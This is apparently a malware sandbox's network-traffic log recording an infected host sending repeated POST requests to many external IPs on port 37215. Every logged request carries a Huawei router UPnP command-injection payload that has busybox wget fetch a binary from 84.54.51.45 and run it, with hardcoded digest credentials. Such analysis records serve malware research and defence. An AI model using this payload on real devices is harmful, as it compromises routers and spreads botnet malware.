2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2154192.168.2.153796241.4.7.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670623064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2155192.168.2.154753641.122.43.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670623064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2156192.168.2.155140641.233.207.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670641899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2157192.168.2.155623241.108.52.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671010971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2158192.168.2.154121641.233.41.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671035051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2159192.168.2.153484041.207.166.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671042919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2160192.168.2.155598641.153.72.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671062946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2161192.168.2.155017841.36.69.22837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671082973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2162192.168.2.154601041.241.205.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671098948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2163192.168.2.153653641.188.46.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671134949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2164192.168.2.153681441.18.23.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671163082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
